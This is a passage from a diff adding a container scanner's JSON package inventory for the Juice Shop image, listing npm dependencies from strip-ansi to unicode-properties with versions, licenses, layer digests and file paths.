"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wide-align/node_modules/strip-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-ansi@6.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@6.0.1", + "UID": "29ed8624e21dc18c" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/strip-ansi-cjs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-ansi@6.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@6.0.1", + "UID": "70e6f906630a6410" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/strip-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-ansi@7.2.0", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@7.2.0", + "UID": "59b4a4b66b5fc82a" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@isaacs/cliui/node_modules/strip-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-ansi@7.2.0", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@7.2.0", + "UID": "c5f184aad1e94d2" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi/node_modules/strip-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-dirs@2.1.0", + "Name": "strip-dirs", + "Identifier": { + "PURL": "pkg:npm/strip-dirs@2.1.0", + "UID": "bff0d910aa17edc7" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/strip-dirs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-json-comments@2.0.1", + "Name": "strip-json-comments", + "Identifier": { + "PURL": "pkg:npm/strip-json-comments@2.0.1", + "UID": "9534e854e5abec0b" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/rc/node_modules/strip-json-comments/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-outer@1.0.1", + "Name": "strip-outer", + "Identifier": { + "PURL": "pkg:npm/strip-outer@1.0.1", + "UID": "39ec39956d9e38ac" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/strip-outer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strtok3@6.3.0", + "Name": "strtok3", + "Identifier": { + "PURL": "pkg:npm/strtok3@6.3.0", + "UID": "4fca5e2a6991d696" + }, + "Version": "6.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/strtok3/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "supports-color@2.0.0", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@2.0.0", + "UID": "8b280a133b422f22" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-contrib-compress/node_modules/supports-color/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "supports-color@5.5.0", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@5.5.0", + "UID": "1cc00a40449158eb" + }, + "Version": "5.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/chalk/node_modules/supports-color/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "supports-color@7.2.0", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@7.2.0", + "UID": "a61110c80bbee83d" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-legacy-log-utils/node_modules/supports-color/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "supports-preserve-symlinks-flag@1.0.0", + "Name": "supports-preserve-symlinks-flag", + "Identifier": { + "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", + "UID": "4b9bc15c0f2766f4" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/supports-preserve-symlinks-flag/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "svg-captcha@1.4.0", + "Name": "svg-captcha", + "Identifier": { + "PURL": "pkg:npm/svg-captcha@1.4.0", + "UID": "226e5a45a4d9ee95" + }, + "Version": "1.4.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/svg-captcha/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "swagger-ui-dist@5.32.6", + "Name": "swagger-ui-dist", + "Identifier": { + "PURL": "pkg:npm/swagger-ui-dist@5.32.6", + "UID": "6ed209b251798577" + }, + "Version": "5.32.6", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/swagger-ui-dist/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "swagger-ui-express@5.0.1", + "Name": "swagger-ui-express", + "Identifier": { + "PURL": "pkg:npm/swagger-ui-express@5.0.1", + "UID": "a2b7b40c758635e2" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/swagger-ui-express/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tar@4.4.19", + "Name": "tar", + "Identifier": { + "PURL": "pkg:npm/tar@4.4.19", + "UID": "e61effc7bf1a1b0d" + }, + "Version": "4.4.19", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/node-pre-gyp/node_modules/tar/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tar@6.2.1", + "Name": "tar", + "Identifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "6267f7fd036a2dd5" + }, + "Version": "6.2.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/tar/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tar@7.5.15", + "Name": "tar", + "Identifier": { + "PURL": "pkg:npm/tar@7.5.15", + "UID": "206ab5cdc791e56a" + }, + "Version": "7.5.15", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tar/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tar-fs@2.1.4", + "Name": "tar-fs", + "Identifier": { + "PURL": "pkg:npm/tar-fs@2.1.4", + "UID": "63810b2d850716f4" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tar-fs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tar-stream@1.6.2", + "Name": "tar-stream", + "Identifier": { + "PURL": "pkg:npm/tar-stream@1.6.2", + "UID": "ef7dfaff84c1e49d" + }, + "Version": "1.6.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tar-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tar-stream@2.2.0", + "Name": "tar-stream", + "Identifier": { + "PURL": "pkg:npm/tar-stream@2.2.0", + "UID": "e2feb6bf55910640" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tar-fs/node_modules/tar-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tdigest@0.1.2", + "Name": "tdigest", + "Identifier": { + "PURL": "pkg:npm/tdigest@0.1.2", + "UID": "bf0dc12bb40ecbb2" + }, + "Version": "0.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tdigest/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "text-hex@1.0.0", + "Name": "text-hex", + "Identifier": { + "PURL": "pkg:npm/text-hex@1.0.0", + "UID": "51b9dd102a7a6f97" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/text-hex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "through@2.3.8", + "Name": "through", + "Identifier": { + "PURL": "pkg:npm/through@2.3.8", + "UID": "30bab81f1ff991fb" + }, + "Version": "2.3.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/through/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "timed-out@4.0.1", + "Name": "timed-out", + "Identifier": { + "PURL": "pkg:npm/timed-out@4.0.1", + "UID": "ed430adf54d398cd" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/timed-out/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tiny-inflate@1.0.3", + "Name": "tiny-inflate", + "Identifier": { + "PURL": "pkg:npm/tiny-inflate@1.0.3", + "UID": "7c4fda35f8d00ba" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tiny-inflate/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tinyglobby@0.2.16", + "Name": "tinyglobby", + "Identifier": { + "PURL": "pkg:npm/tinyglobby@0.2.16", + "UID": "2ce09ed06d37d010" + }, + "Version": "0.2.16", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tinyglobby/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "to-buffer@1.2.2", + "Name": "to-buffer", + "Identifier": { + "PURL": "pkg:npm/to-buffer@1.2.2", + "UID": "5fd5e483003ec3dc" + }, + "Version": "1.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/to-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "to-regex-range@5.0.1", + "Name": "to-regex-range", + "Identifier": { + "PURL": "pkg:npm/to-regex-range@5.0.1", + "UID": "d5f65a6a38218d24" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/to-regex-range/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "toidentifier@1.0.1", + "Name": "toidentifier", + "Identifier": { + "PURL": "pkg:npm/toidentifier@1.0.1", + "UID": "ac5076373ea3b725" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/toidentifier/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "token-stream@1.0.0", + "Name": "token-stream", + "Identifier": { + "PURL": "pkg:npm/token-stream@1.0.0", + "UID": "5242e7a4de00b299" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/token-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "token-types@4.2.1", + "Name": "token-types", + "Identifier": { + "PURL": "pkg:npm/token-types@4.2.1", + "UID": "e38b6c12ca3a01b6" + }, + "Version": "4.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/token-types/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "toposort-class@1.0.1", + "Name": "toposort-class", + "Identifier": { + "PURL": "pkg:npm/toposort-class@1.0.1", + "UID": "a1b5525bc781eae4" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/toposort-class/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "traverse@0.3.9", + "Name": "traverse", + "Identifier": { + "PURL": "pkg:npm/traverse@0.3.9", + "UID": "9566592183f41416" + }, + "Version": "0.3.9", + "Licenses": [ + "MIT/X11" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/traverse/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "trim-repeated@1.0.0", + "Name": "trim-repeated", + "Identifier": { + "PURL": "pkg:npm/trim-repeated@1.0.0", + "UID": "db4d23c57ebd3710" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/trim-repeated/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "triple-beam@1.4.1", + "Name": "triple-beam", + "Identifier": { + "PURL": "pkg:npm/triple-beam@1.4.1", + "UID": "f549d8801ad67317" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/triple-beam/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "truncate-utf8-bytes@1.0.2", + "Name": "truncate-utf8-bytes", + "Identifier": { + "PURL": "pkg:npm/truncate-utf8-bytes@1.0.2", + "UID": "c2e3346acb2c7ae7" + }, + "Version": "1.0.2", + "Licenses": [ + "WTFPL" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/truncate-utf8-bytes/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tslib@2.7.0", + "Name": "tslib", + "Identifier": { + "PURL": "pkg:npm/tslib@2.7.0", + "UID": "771c6e4bbd07c113" + }, + "Version": "2.7.0", + "Licenses": [ + "0BSD" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tslib/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "tunnel-agent@0.6.0", + "Name": "tunnel-agent", + "Identifier": { + "PURL": "pkg:npm/tunnel-agent@0.6.0", + "UID": "18e3fd151ea326ff" + }, + "Version": "0.6.0", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/tunnel-agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "type-is@1.6.18", + "Name": "type-is", + "Identifier": { + "PURL": "pkg:npm/type-is@1.6.18", + "UID": "199bf01ce031614e" + }, + "Version": "1.6.18", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/type-is/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "typecast@0.0.1", + "Name": "typecast", + "Identifier": { + "PURL": "pkg:npm/typecast@0.0.1", + "UID": "988eb78895b4558d" + }, + "Version": "0.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/typecast/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "typed-array-buffer@1.0.3", + "Name": "typed-array-buffer", + "Identifier": { + "PURL": "pkg:npm/typed-array-buffer@1.0.3", + "UID": "1958a9cc94a593f8" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/typed-array-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "typedarray@0.0.6", + "Name": "typedarray", + "Identifier": { + "PURL": "pkg:npm/typedarray@0.0.6", + "UID": "ad5f55e829423973" + }, + "Version": "0.0.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/typedarray/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "uglify-js@3.19.3", + "Name": "uglify-js", + "Identifier": { + "PURL": "pkg:npm/uglify-js@3.19.3", + "UID": "290351deb881072d" + }, + "Version": "3.19.3", + "Licenses": [ + "BSD-2-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/uglify-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unbzip2-stream@1.4.3", + "Name": "unbzip2-stream", + "Identifier": { + "PURL": "pkg:npm/unbzip2-stream@1.4.3", + "UID": "1d894091d11257ae" + }, + "Version": "1.4.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unbzip2-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unc-path-regex@0.1.2", + "Name": "unc-path-regex", + "Identifier": { + "PURL": "pkg:npm/unc-path-regex@0.1.2", + "UID": "6cbc947cb38cfcd" + }, + "Version": "0.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/unc-path-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "underscore.string@3.3.6", + "Name": "underscore.string", + "Identifier": { + "PURL": "pkg:npm/underscore.string@3.3.6", + "UID": "a88fca476925ff40" + }, + "Version": "3.3.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/underscore.string/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "undici-types@6.19.8", + "Name": "undici-types", + "Identifier": { + "PURL": "pkg:npm/undici-types@6.19.8", + "UID": "d4ab177571053a21" + }, + "Version": "6.19.8", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ethers/node_modules/undici-types/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "undici-types@6.21.0", + "Name": "undici-types", + "Identifier": { + "PURL": "pkg:npm/undici-types@6.21.0", + "UID": "2455d987e602f83e" + }, + "Version": "6.21.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/undici-types/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "unicode-properties@1.4.1", + "Name": "unicode-properties", + "Identifier": { + "PURL": "pkg:npm/unicode-properties@1.4.1", + "UID": "b06e49f7bd37e256" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": 